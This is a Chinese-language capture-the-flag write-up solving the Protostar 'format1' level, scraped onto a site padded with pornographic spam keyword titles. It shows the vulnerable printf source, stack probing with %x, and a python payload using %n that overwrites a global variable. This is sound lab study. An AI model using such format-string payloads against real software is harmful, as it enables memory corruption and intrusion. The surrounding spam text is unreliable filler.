欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

Protostarformat1

About

This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
printf(string);

if(target) {
    printf("you have modified the target :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

這題一開始不會(huì)做,因?yàn)橹皩慍時(shí)比較少研究format的東東,因此也就沒接觸過%n這個(gè)東東。而簡(jiǎn)單簡(jiǎn)介下%n吧:
輸出格式 %n 可以將所輸出字符串的長(zhǎng)度值賦紿一個(gè)變量, 見下例:
    int slen;
    printf("hello world%n", &slen);
    執(zhí)行后變量slen被賦值為11。

再結(jié)合這道題的printf(string),其實(shí)這個(gè)跟printf("%s",string)是不一樣的,問題就是出自這里,當(dāng)格式化字符串后再加上%x的話會(huì)緊接著讀取堆棧里面的內(nèi)容。
首先要獲得target的地址:
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g         O .bss     00000004                            target

然后須在堆棧中找到執(zhí)行賦值動(dòng)作的位置,可用%x來填充堆棧的內(nèi)容:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*150+"%x"')
aaaaaaaa804960c.bffff628.8048469.b7fd8304.b7fd7ff4.bffff628.8048435.bffff7f1.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6a8.b7eadc76.2.bffff6d4.bffff6e0.b7fe1848.bffff690.ffffffff.b7ffeff4.804824d.1.bffff690.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6a8.1e6dfbd.2bb2c9ad.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6d4.8048450.8048440.b7ff1040.bffff6cc.b7fff8f8.2.bffff7e7.bffff7f1.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7cb.1f.bffffff2.f.bffff7db.0.0.0.19000000.5f0430f3.ed617f05.8671f725.69f2e525.363836.0.2e000000.726f662f.3174616d.61616100.61616161.2e782561.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e

目測(cè)大概在128個(gè)%x的位置,確認(rèn)一下:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*128+"%x"')
aaaaaaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fa7bb769.d02f2179.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.c000000.ab329b49.980b02cb.973cca28.695fb6c8.363836.0.0.662f2e00.616d726f.61003174.61616161

我們把前4字節(jié)換成target的地址:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print " \x38\x96\x04\x08aaaa" + "%x."*128+"%x"')
8aaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.6a958dd0.40c11bc0.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.86000000.b6399ac7.1f57cabc.3bd68bc6.69c7f777.363836.0.0.662f2e00.616d726f.38003174.61080496
發(fā)現(xiàn)有一個(gè)字節(jié)的錯(cuò)位,須調(diào)整一下:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%x"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fae225a2.d0b6b3b2.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.40000000.628ccb6c.1f6e8287.90ab45aa.6922104d.363836.0.0.662f2e00.616d726f.61003174.8049638

好了,定位成功了把最后的%x換成%x即可:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%n"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.2f09ffa.28a409ea.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.89000000.3f3cec1e.c342fe8e.7223fa6a.699b71e8.363836.0.0.662f2e00.616d726f.61003174.you have modified the target :)



標(biāo)題名稱:Protostarformat1
轉(zhuǎn)載來于:http://www.aaarwkj.com/article6/pegjig.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、電子商務(wù)、App設(shè)計(jì)、網(wǎng)站設(shè)計(jì)、網(wǎng)站導(dǎo)航、網(wǎng)站內(nèi)鏈

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

營(yíng)銷型網(wǎng)站建設(shè)
日韩av在线观看大全| 欧美欧美欧美欧美在线| 香婷婷一区二区精品久久| 91麻豆精品国产91久5久久| 91欧美日韩在线观看视频| 国产偷自一区二区三区| 国产精品久久护士96| 亚洲国产高清第一第二区| 免费高清视频一区二区在线观看| 激情视频一区二区三区| 国产一级夫妻性生活欧美| 日本理伦片一区二区| 成人亚洲理论片在线观看| 国产激情盗摄一区二区三区| 日本久久91跳蛋视频| 欧美日韩精品人妻一区| 妇女人妻丰满少妇中文字幕| 91精品国产老熟女在线| 福利1中文字幕手机在线| 色哟哟91精品色哟哟| 久久久久精品久久久| 亚洲国产成人精品女人久久久′ | 日本韩国亚洲欧美一区二区| 亚洲一区二区三区香蕉不卡| 国产激情在线四五区观看| 四虎海外免费永久地址| 日本熟女中文字幕一区| 亚洲一区二区三区女同| 校园春色亚洲欧美日韩| 亚洲天堂欧美日韩一区| 中文乱码字幕午夜无线观看| 亚洲中文字幕一二区日韩| 乱色视频中文字幕在线着| 欧美精品青青久久久久久| 亚洲精品不卡一区二区| 丰满人妻的诱惑中文字幕| 日韩不卡永久免费视频观看| 一区二区在线视频中文字幕| 99久久精品人妻少妇一| 一区二区三区熟妇人妻视频| 高清国语对白刺激av在线播放|